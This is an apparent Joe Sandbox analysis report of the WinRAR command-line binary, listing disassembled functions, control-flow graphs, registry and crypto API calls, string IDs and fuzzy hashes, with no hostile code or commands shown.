                                                            control_flow_graph 1405 7ff71d2c4fd0-7ff71d2c502d call 7ff71d30a5a0 1408 7ff71d2c502f-7ff71d2c5037 1405->1408 1409 7ff71d2c504d-7ff71d2c5055 1405->1409 1408->1409 1410 7ff71d2c5039-7ff71d2c504b call 7ff71d30c8a0 1408->1410 1411 7ff71d2c5057-7ff71d2c5069 call 7ff71d2c481c 1409->1411 1412 7ff71d2c506e-7ff71d2c5089 call 7ff71d2e420c 1409->1412 1410->1409 1410->1411 1411->1412 1418 7ff71d2c509f-7ff71d2c50b6 call 7ff71d2fdb08 1412->1418 1419 7ff71d2c508b-7ff71d2c509d call 7ff71d2fa9c0 1412->1419 1424 7ff71d2c511b-7ff71d2c5131 call 7ff71d30c8a0 1418->1424 1425 7ff71d2c50b8-7ff71d2c50c3 call 7ff71d2fa59c 1418->1425 1419->1424 1430 7ff71d2c5203-7ff71d2c520d call 7ff71d2faa48 1424->1430 1431 7ff71d2c5137-7ff71d2c513e 1424->1431 1425->1424 1432 7ff71d2c50c5-7ff71d2c50cf call 7ff71d2d3054 1425->1432 1440 7ff71d2c5212-7ff71d2c521c 1430->1440 1433 7ff71d2c5140-7ff71d2c5167 call 7ff71d2e3f98 1431->1433 1434 7ff71d2c516c-7ff71d2c51be call 7ff71d2faa1c call 7ff71d2faa48 call 7ff71d2f6e98 1431->1434 1432->1424 1443 7ff71d2c50d1-7ff71d2c5107 call 7ff71d2fa9e8 call 7ff71d2fa9c0 call 7ff71d2d3054 1432->1443 1433->1434 1491 7ff71d2c51d3-7ff71d2c51e8 call 7ff71d2f7a24 1434->1491 1441 7ff71d2c5222 1440->1441 1442 7ff71d2c52db-7ff71d2c52e0 1440->1442 1445 7ff71d2c532f-7ff71d2c5332 1441->1445 1446 7ff71d2c5228-7ff71d2c522d 1441->1446 1447 7ff71d2c52e6-7ff71d2c52e9 1442->1447 1448 7ff71d2c5453-7ff71d2c5477 call 7ff71d2cf00c call 7ff71d2cf230 call 7ff71d2cf09c 1442->1448 1443->1424 1516 7ff71d2c5109-7ff71d2c5116 call 7ff71d2fa9e8 1443->1516 1454 7ff71d2c5334 1445->1454 1455 7ff71d2c533b-7ff71d2c533e 1445->1455 1446->1445 1452 7ff71d2c5233-7ff71d2c5236 1446->1452 1456 7ff71d2c52ef-7ff71d2c52f2 1447->1456 1457 7ff71d2c5379-7ff71d2c5382 1447->1457 1510 7ff71d2c547c-7ff71d2c5483 1448->1510 1461 7ff71d2c5290-7ff71d2c5299 1452->1461 1462 7ff71d2c5238-7ff71d2c523b 1452->1462 1454->1455 1466 7ff71d2c5340 1455->1466 1467 7ff71d2c5347-7ff71d2c5358 call 7ff71d2b1230 call 7ff71d2b4858 1455->1467 1468 7ff71d2c52f4-7ff71d2c52f7 1456->1468 1469 7ff71d2c536c-7ff71d2c5374 call 7ff71d2f81cc 1456->1469 1464 7ff71d2c5449-7ff71d2c5451 call 7ff71d2eeab8 1457->1464 1465 7ff71d2c5388-7ff71d2c538b 1457->1465 1472 7ff71d2c52b2-7ff71d2c52bd 1461->1472 1473 7ff71d2c529b-7ff71d2c529e 1461->1473 1475 7ff71d2c5274-7ff71d2c528b call 7ff71d2b1230 call 7ff71d2b48ec 1462->1475 1476 7ff71d2c523d-7ff71d2c5240 1462->1476 1464->1510 1480 7ff71d2c5391-7ff71d2c5397 1465->1480 1481 7ff71d2c541b-7ff71d2c5433 call 7ff71d2fab1c 1465->1481 1466->1467 1524 7ff71d2c535d 1467->1524 1468->1448 1470 7ff71d2c52fd-7ff71d2c5300 1468->1470 1469->1510 1470->1445 1483 7ff71d2c5302-7ff71d2c5305 1470->1483 1490 7ff71d2c52ce-7ff71d2c52d6 call 7ff71d2e55e0 1472->1490 1492 7ff71d2c52bf-7ff71d2c52c9 call 7ff71d2fa9e8 1472->1492 1489 7ff71d2c52a0-7ff71d2c52a6 1473->1489 1473->1490 1542 7ff71d2c535e-7ff71d2c5362 call 7ff71d2b14fc 1475->1542 1476->1448 1485 7ff71d2c5246-7ff71d2c5249 1476->1485 1496 7ff71d2c5399-7ff71d2c539c 1480->1496 1497 7ff71d2c540c-7ff71d2c5419 call 7ff71d2e54f8 call 7ff71d2e51e4 1480->1497 1481->1510 1523 7ff71d2c5435-7ff71d2c5447 call 7ff71d2ebbd4 1481->1523 1498 7ff71d2c5322-7ff71d2c532a call 7ff71d2d67e0 1483->1498 1499 7ff71d2c5307-7ff71d2c530a 1483->1499 1485->1445 1501 7ff71d2c524f-7ff71d2c5252 1485->1501 1506 7ff71d2c5313-7ff71d2c531d call 7ff71d2c481c 1489->1506 1507 7ff71d2c52a8-7ff71d2c52ad call 7ff71d2c7214 1489->1507 1490->1510 1544 7ff71d2c51c0-7ff71d2c51ce call 7ff71d2faa48 1491->1544 1545 7ff71d2c51ea-7ff71d2c5201 call 7ff71d2f6f68 call 7ff71d2b14c0 1491->1545 1492->1490 1513 7ff71d2c53ef-7ff71d2c5401 call 7ff71d2c45c8 1496->1513 1514 7ff71d2c539e-7ff71d2c53a1 1496->1514 1497->1510 1498->1510 1499->1448 1515 7ff71d2c5310 1499->1515 1501->1448 1518 7ff71d2c5258-7ff71d2c525b 1501->1518 1506->1510 1507->1510 1529 7ff71d2c5491-7ff71d2c54bc call 7ff71d30a610 1510->1529 1530 7ff71d2c5485-7ff71d2c548c call 7ff71d2c8444 1510->1530 1513->1497 1514->1506 1528 7ff71d2c53a7-7ff71d2c53d5 call 7ff71d2c45c8 call 7ff71d2fab1c 1514->1528 1515->1506 1516->1424 1535 7ff71d2c525d-7ff71d2c5260 1518->1535 1536 7ff71d2c526b-7ff71d2c5272 1518->1536 1523->1510 1524->1542 1528->1510 1560 7ff71d2c53db-7ff71d2c53ea call 7ff71d2eba9c 1528->1560 1530->1529 1535->1498 1549 7ff71d2c5266 1535->1549 1536->1490 1556 7ff71d2c5367 1542->1556 1544->1491 1545->1440 1549->1515 1556->1510 1560->1510
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: wcschr
                                                            • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                            • API String ID: 1497570035-1281034975
                                                            • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                            • Instruction ID: a0e27948345441ff5aa5e3b1232aad97becc9319cddb1358c06b470c282ab100
                                                            • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                            • Instruction Fuzzy Hash: 76C1A421A2CD8280EA34BE2488511FD9391EF467A4FC44131D96E4A5DAFE6CFA09CB31
                                                            Function 00007FF71D2F7F24 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1564 7ff71d2f7f24-7ff71d2f7f5c 1565 7ff71d2f7fd0 1564->1565 1566 7ff71d2f7f5e-7ff71d2f7f64 1564->1566 1568 7ff71d2f7fd7-7ff71d2f7fea 1565->1568 1566->1565 1567 7ff71d2f7f66-7ff71d2f7f7c call 7ff71d2fb3f0 1566->1567 1578 7ff71d2f7fb5 1567->1578 1579 7ff71d2f7f7e-7ff71d2f7fb3 GetProcAddressForCaller GetProcAddress 1567->1579 1569 7ff71d2f8036-7ff71d2f8039 1568->1569 1570 7ff71d2f7fec-7ff71d2f7fef 1568->1570 1573 7ff71d2f805c-7ff71d2f8065 GetCurrentProcessId 1569->1573 1575 7ff71d2f803b-7ff71d2f804a 1569->1575 1572 7ff71d2f7ff1-7ff71d2f8000 1570->1572 1570->1573 1585 7ff71d2f8005-7ff71d2f8007 1572->1585 1576 7ff71d2f8077-7ff71d2f8093 1573->1576 1577 7ff71d2f8067 1573->1577 1584 7ff71d2f804f-7ff71d2f8051 1575->1584 1582 7ff71d2f8069-7ff71d2f8075 1577->1582 1583 7ff71d2f7fbc-7ff71d2f7fce 1578->1583 1579->1583 1582->1576 1582->1582 1583->1568 1584->1576 1586 7ff71d2f8053-7ff71d2f805a 1584->1586 1585->1576 1587 7ff71d2f8009 1585->1587 1588 7ff71d2f8010-7ff71d2f8034 call 7ff71d2cca6c call 7ff71d2ccda4 call 7ff71d2cca40 1586->1588 1587->1588 1588->1576
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                            • API String ID: 1389829785-2207617598
                                                            • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                            • Instruction ID: 7db2b4eb0564b9841800557f776e2d4546f97801aff8064b4798507016469114
                                                            • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                            • Instruction Fuzzy Hash: 98414D31A0CE9681EA55AB12A800579EB61BF45BF4FC80639CD6D07754FE7CE44E9B20
                                                            Function 00007FF71D30B0FC Relevance: 13.6, APIs: 9, Instructions: 92COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                            • String ID:
                                                            • API String ID: 552178382-0
                                                            • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                            • Instruction ID: 809a46300f31bc07be8e5ce3eff174d836e292f4b08926a2f16eb7550bc2511e
                                                            • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                            • Instruction Fuzzy Hash: D2310631E0CA43C2EA18BF24A4523B9E391AF557A4FC4403CEA5D476D7FE2CA40D8A60
                                                            Function 00007FF71D2F4774 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF71D2F495D,?,?,?,00007FF71D2E7E7D), ref: 00007FF71D2F47DB
                                                            • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF71D2F495D,?,?,?,00007FF71D2E7E7D), ref: 00007FF71D2F4831
                                                            • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF71D2F495D,?,?,?,00007FF71D2E7E7D), ref: 00007FF71D2F4853
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF71D2F495D,?,?,?,00007FF71D2E7E7D), ref: 00007FF71D2F48A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                            • String ID: LanguageFolder$Software\WinRAR\General
                                                            • API String ID: 1800380464-3408810217
                                                            • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                            • Instruction ID: 71ce63fa2a91c49f0e8a9f76fe4fcc923ba0a6a9aa390d0bb43a625c4a7477fa
                                                            • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                            • Instruction Fuzzy Hash: 9E318022A1CE8185EA60AB21E8502EAE351FF847A4F804635EE5D47B99FE6CD14DCB10
                                                            Function 00007FF71D2E4398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2E43D1
                                                            • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2E4402
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2E440D
                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF71D2E38CB,?,?,?,00007FF71D2E41EC), ref: 00007FF71D2E443E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID: CloseFileModuleNameOpenQueryValue
                                                            • String ID: AppData$Software\WinRAR\Paths
                                                            • API String ID: 3617018055-3415417297
                                                            • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                            • Instruction ID: 3359017ad99a4ecb2638667b615df3e63b2d540e0093da2ff3edeb641645c3c8
                                                            • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                            • Instruction Fuzzy Hash: 00115132A1CB4185EA10AF26E4005A9F361FF88BA4F845135EA5E07655FF3CE109CB10
                                                            Function 00007FF71D2B7A5B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1715 7ff71d2b7a5b-7ff71d2b7a5e 1716 7ff71d2b7a60-7ff71d2b7a66 1715->1716 1717 7ff71d2b7a68 1715->1717 1716->1717 1718 7ff71d2b7a6b-7ff71d2b7a7c 1716->1718 1717->1718 1719 7ff71d2b7aa8 1718->1719 1720 7ff71d2b7a7e-7ff71d2b7a81 1718->1720 1721 7ff71d2b7aab-7ff71d2b7ab8 1719->1721 1722 7ff71d2b7a83-7ff71d2b7a86 1720->1722 1723 7ff71d2b7a88-7ff71d2b7a8b 1720->1723 1724 7ff71d2b7aba-7ff71d2b7abd 1721->1724 1725 7ff71d2b7ac8-7ff71d2b7acb 1721->1725 1722->1719 1722->1723 1726 7ff71d2b7aa4-7ff71d2b7aa6 1723->1726 1727 7ff71d2b7a8d-7ff71d2b7a90 1723->1727 1724->1725 1729 7ff71d2b7abf-7ff71d2b7ac6 1724->1729 1730 7ff71d2b7acf-7ff71d2b7ad1 1725->1730 1726->1721 1727->1719 1728 7ff71d2b7a92-7ff71d2b7a99 1727->1728 1728->1726 1731 7ff71d2b7a9b-7ff71d2b7aa2 1728->1731 1729->1730 1732 7ff71d2b7ad3-7ff71d2b7ae6 1730->1732 1733 7ff71d2b7b2a-7ff71d2b7bb0 call 7ff71d2d1d34 call 7ff71d2b3f04 1730->1733 1731->1719 1731->1726 1734 7ff71d2b7b0a-7ff71d2b7b27 1732->1734 1735 7ff71d2b7ae8-7ff71d2b7af2 call 7ff71d2c9be0 1732->1735 1744 7ff71d2b7bb2-7ff71d2b7bba 1733->1744 1745 7ff71d2b7bbc 1733->1745 1734->1733 1740 7ff71d2b7af7-7ff71d2b7b02 1735->1740 1740->1734 1744->1745 1746 7ff71d2b7bbf-7ff71d2b7bc9 1744->1746 1745->1746 1747 7ff71d2b7bda-7ff71d2b7c06 call 7ff71d2bb540 1746->1747 1748 7ff71d2b7bcb-7ff71d2b7bd5 call 7ff71d2d1e1c 1746->1748 1752 7ff71d2b7c40 1747->1752 1753 7ff71d2b7c08-7ff71d2b7c0f 1747->1753 1748->1747 1754 7ff71d2b7c44-7ff71d2b7c5a call 7ff71d2baa68 1752->1754 1753->1752 1755 7ff71d2b7c11-7ff71d2b7c14 1753->1755 1761 7ff71d2b7c85-7ff71d2b7c97 call 7ff71d2bb540 1754->1761 1762 7ff71d2b7c5c-7ff71d2b7c6a 1754->1762 1755->1752 1757 7ff71d2b7c16-7ff71d2b7c2b 1755->1757 1757->1754 1758 7ff71d2b7c2d-7ff71d2b7c3e call 7ff71d309b98 1757->1758 1758->1754 1767 7ff71d2b7c9c-7ff71d2b7c9f 1761->1767 1762->1761 1764 7ff71d2b7c6c-7ff71d2b7c7e call 7ff71d2b8d98 1762->1764 1764->1761 1769 7ff71d2b7ca5-7ff71d2b7cfb call 7ff71d2e9354 call 7ff71d2d6378 * 2 1767->1769 1770 7ff71d2b7fa4-7ff71d2b7fbe 1767->1770 1777 7ff71d2b7d17-7ff71d2b7d1f 1769->1777 1778 7ff71d2b7cfd-7ff71d2b7d10 call 7ff71d2b5414 1769->1778 1780 7ff71d2b7de2-7ff71d2b7de6 1777->1780 1781 7ff71d2b7d25-7ff71d2b7d28 1777->1781 1778->1777 1783 7ff71d2b7de8-7ff71d2b7e49 call 7ff71d2e98dc 1780->1783 1784 7ff71d2b7e4e-7ff71d2b7e68 call 7ff71d2e9958 1780->1784 1781->1780 1785 7ff71d2b7d2e-7ff71d2b7d36 1781->1785 1783->1784 1794 7ff71d2b7e6a-7ff71d2b7e84 1784->1794 1795 7ff71d2b7e8b-7ff71d2b7e8e 1784->1795 1788 7ff71d2b7d59-7ff71d2b7d6a call 7ff71d30a444 1785->1788 1789 7ff71d2b7d38-7ff71d2b7d49 call 7ff71d30a444 1785->1789 1797 7ff71d2b7d78-7ff71d2b7dc6 1788->1797 1798 7ff71d2b7d6c-7ff71d2b7d77 call 7ff71d2dcf8c 1788->1798 1801 7ff71d2b7d57 1789->1801 1802 7ff71d2b7d4b-7ff71d2b7d56 call 7ff71d2d8ae8 1789->1802 1794->1795 1799 7ff71d2b7e9f-7ff71d2b7eb8 call 7ff71d2b1204 1795->1799 1800 7ff71d2b7e90-7ff71d2b7e9a call 7ff71d2e9990 1795->1800 1797->1780 1822 7ff71d2b7dc8-7ff71d2b7de1 call 7ff71d2b1314 call 7ff71d30ba34 1797->1822 1798->1797 1812 7ff71d2b7ec8-7ff71d2b7ed9 call 7ff71d2e941c 1799->1812 1800->1799 1801->1797 1802->1801 1817 7ff71d2b7eba-7ff71d2b7ec3 call 7ff71d2e9680 1812->1817 1818 7ff71d2b7edb-7ff71d2b7f9f call 7ff71d2b1400 call 7ff71d2d6424 call 7ff71d2bb540 1812->1818 1817->1812 1818->1770 1822->1780
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
                                                            • Associated: 00000048.00000002.1645601376.00007FF71D2B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645705847.00007FF71D320000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645747287.00007FF71D338000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645803986.00007FF71D339000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D33A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D344000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D34E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1645847555.00007FF71D356000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646107333.00007FF71D358000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            • Associated: 00000048.00000002.1646150133.00007FF71D35E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_72_2_7ff71d2b0000_rar.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: H9
                                                            • API String ID: 0-2207570329
                                                            • Opcode ID: 6c7bc826278d7ea269c3741db8a1faab47c2ba2902a6fc586a2818d3bcdcd0b2
                                                            • Instruction ID: 8b27c9337bd328f6f8229e5451ff44aa7f59f43c2347437dace20874b5d2ec29
                                                            • Opcode Fuzzy Hash: 6c7bc826278d7ea269c3741db8a1faab47c2ba2902a6fc586a2818d3bcdcd0b2
                                                            • Instruction Fuzzy Hash: C3E1C062A0CF9285EB10EB25E044AFDA3A5EB4975CF894535CE5D03785EF78E648CB20
                                                            Function 00007FF71D2D2574 Relevance: 7.6, APIs: 5, Instructions: 133fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1858 7ff71d2d2574-7ff71d2d259c 1859 7ff71d2d25a5-7ff71d2d25a9 1858->1859 1860 7ff71d2d259e-7ff71d2d25a0 1858->1860 1862 7ff71d2d25ab-7ff71d2d25b6 GetStdHandle 1859->1862 1863 7ff71d2d25ba-7ff71d2d25c6 1859->1863 1861 7ff71d2d273a-7ff71d2d2756 1860->1861 1862->1863 1864 7ff71d2d25c8-7ff71d2d25cd 1863->1864 1865 7ff71d2d2619-7ff71d2d2637 WriteFile 1863->1865 1866 7ff71d2d2644-7ff71d2d2648 1864->1866 1867 7ff71d2d25cf-7ff71d2d2609 WriteFile 1864->1867 1868 7ff71d2d263b-7ff71d2d263e 1865->1868 1870 7ff71d2d2733-7ff71d2d2737 1866->1870 1871 7ff71d2d264e-7ff71d2d2652 1866->1871 1867->1866 1869 7ff71d2d260b-7ff71d2d2615 1867->1869 1868->1866 1868->1870 1869->1867 1872 7ff71d2d2617 1869->1872 1870->1861 1871->1870 1873 7ff71d2d2658-7ff71d2d2692 GetLastError call 7ff71d2d3144 SetLastError 1871->1873 1872->1868 1878 7ff71d2d2694-7ff71d2d26a2 1873->1878 1879 7ff71d2d26bc-7ff71d2d26d0 call 7ff71d2cc95c 1873->1879 1878->1879 1880 7ff71d2d26a4-7ff71d2d26ab 1878->1880 1885 7ff71d2d2721-7ff71d2d272e call 7ff71d2ccf14 1879->1885 1886 7ff71d2d26d2-7ff71d2d26db 1879->1886 1880->1879 1882 7ff71d2d26ad-7ff71d2d26b7 call 7ff71d2ccf34 1880->1882 1882->1879 1885->1870 1886->1863 1888 7ff71d2d26e1-7ff71d2d26e3 1886->1888 1888->1863 1889 7ff71d2d26e9-7ff71d2d271c 1888->1889 1889->1863
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000048.00000002.1645635451.00007FF71D2B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF71D2B0000, based on PE: true
